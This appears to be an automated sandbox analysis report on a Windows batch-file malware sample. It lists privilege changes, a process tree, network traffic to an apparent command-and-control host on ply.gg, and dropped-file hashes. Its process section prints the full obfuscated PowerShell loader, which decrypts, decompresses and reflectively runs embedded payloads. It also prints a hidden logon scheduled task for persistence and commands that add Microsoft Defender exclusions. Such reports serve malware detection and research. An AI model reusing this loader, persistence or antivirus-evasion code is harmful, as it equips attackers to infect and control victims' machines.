Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3124 wrote to memory of 1040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1040 wrote to memory of 2476 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3124 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3124 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 4312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 856 wrote to memory of 3548 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4860 wrote to memory of 2764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3548 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 4888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 4024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4024 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_583_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat" "

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA81.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 movie-buddy.gl.at.ply.gg udp
US 147.185.221.16:40572 movie-buddy.gl.at.ply.gg tcp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp

Files

memory/2272-0-0x00007FFDFEE33000-0x00007FFDFEE35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzuaoncl.0nj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2272-10-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/2272-9-0x0000029CC9FD0000-0x0000029CC9FF2000-memory.dmp

memory/2272-11-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/2272-12-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/2272-13-0x0000029CCA420000-0x0000029CCA466000-memory.dmp

memory/2272-14-0x0000029CCA000000-0x0000029CCA008000-memory.dmp

memory/2272-15-0x0000029CCA010000-0x0000029CCA022000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs

MD5 0654dd1a454d5c2b847dce0f59f5b922
SHA1 bea6406190f36107f5fbad51498fcfbd62367020
SHA256 42ff0396b3f9accbb6fe993139b377dfa0291b4c8e27930aa86406fbbaf02fdf
SHA512 c36b6c6ccc8fac3ef0f8477315a7d7ba864691e1620633c4926827ec8ef0ed4274ab5e2efc09f573a70388356b46c43768fc12a3443e4c2988ffac8435921143

C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat

MD5 1e16a3b0237093cea53d9dff9593c17a
SHA1 4227feac46a1a00827029d784442ca250c3d27b1
SHA256 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833
SHA512 74bbadb0adf926c2cb7f7a5df7de53044c12bd9c4cdd21542c1190206ef8e3356678489c94c1fd099c47f2df8d9d9a981bbe71f3127ef7d402154fff76d10898

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b49b4568e58d92adb2364d63f8e93e40
SHA1 2f3ea5c739d4bf93fc706580e91a284d05f8809f
SHA256 4d684f3c0fdaf79abec51fb181b2aef1a9ce532408bdc06d6aa6b0c114b699e7
SHA512 2054bf5fc94786910886410a32b3e80a72d6cbc297c8126129c898048224825f520aa134287040abfc19864e672ed2d56ba1dd4ec5e0efca87b2e5c8182da050

memory/3508-43-0x0000025B71C40000-0x0000025B71C52000-memory.dmp

memory/3508-44-0x0000025B71ED0000-0x0000025B71EE6000-memory.dmp

memory/2272-45-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f65feb0fbbd0fcb9da91d117a38e4f31
SHA1 95b1256dd050df6d555a4d06d4dc7ac542b6a070
SHA256 cb0bff45abfcccadc000e77840ccf5004ae4197a8d98baab877e6e9c238bba0c
SHA512 0715ba19e75a60eeb6cf98f4bc80980f1f1e681bd69d3ce242bf1c50787b82eb99064de0c0753c4259dcc8837a65ac2b7c84b3c1f114200cb252c05e448b1776

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA1 9910190edfaccece1dfcc1d92e357772f5dae8f7
SHA256 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA512 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9030854a24cf37b7b4e3650aac67d427
SHA1 27f3e35705bbe6388da04bf97e09da1875a6bc71
SHA256 e818d49edbec3553b77c8a400c04fc88b601614946c281fc9c86acf9498010e0
SHA512 f402098f60d99d7e7130095c6965bb540454ff9867e72a9c2efaf833967639b802f193f9e73af53829167b43a2d9100e19f9056621f75543fa2aadad1e185dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a116d56b723a0d248b5a38cbc3429288
SHA1 75efdbe43b0db5b4b4761166e1a6926316715f54
SHA256 f17648922a442aed77374620c12e8a0fb492290a191204ccdb1eca3dcf2d6258
SHA512 a19db0a5120a5857571ec2593d80e9d78405a9fb4bee0f358c8dca484d1f2760d79cdb9a7abfd48db1175d09be6b190e0d02837f59cc10f212215f16b14986c0

C:\Users\Admin\AppData\Local\Temp\tmpDA81.tmp.bat

MD5 2e33c6b784aa31150c78fd6063e3a88a
SHA1 4c0af3d16cb4a4a5b8f3433b642b086066da5218
SHA256 d93f9bbb1e7613b7d354be6333a7a5eac2c3019c626d9f00973d4bdb697906ae
SHA512 4db0eb6184b5afa3314d01d98652cb8e74a1dfe1f5632fe79b92a8c6c1e0bcd8630f02165e4034b26ea49f1b567f63f296981d3b658e24383895a3b68695b338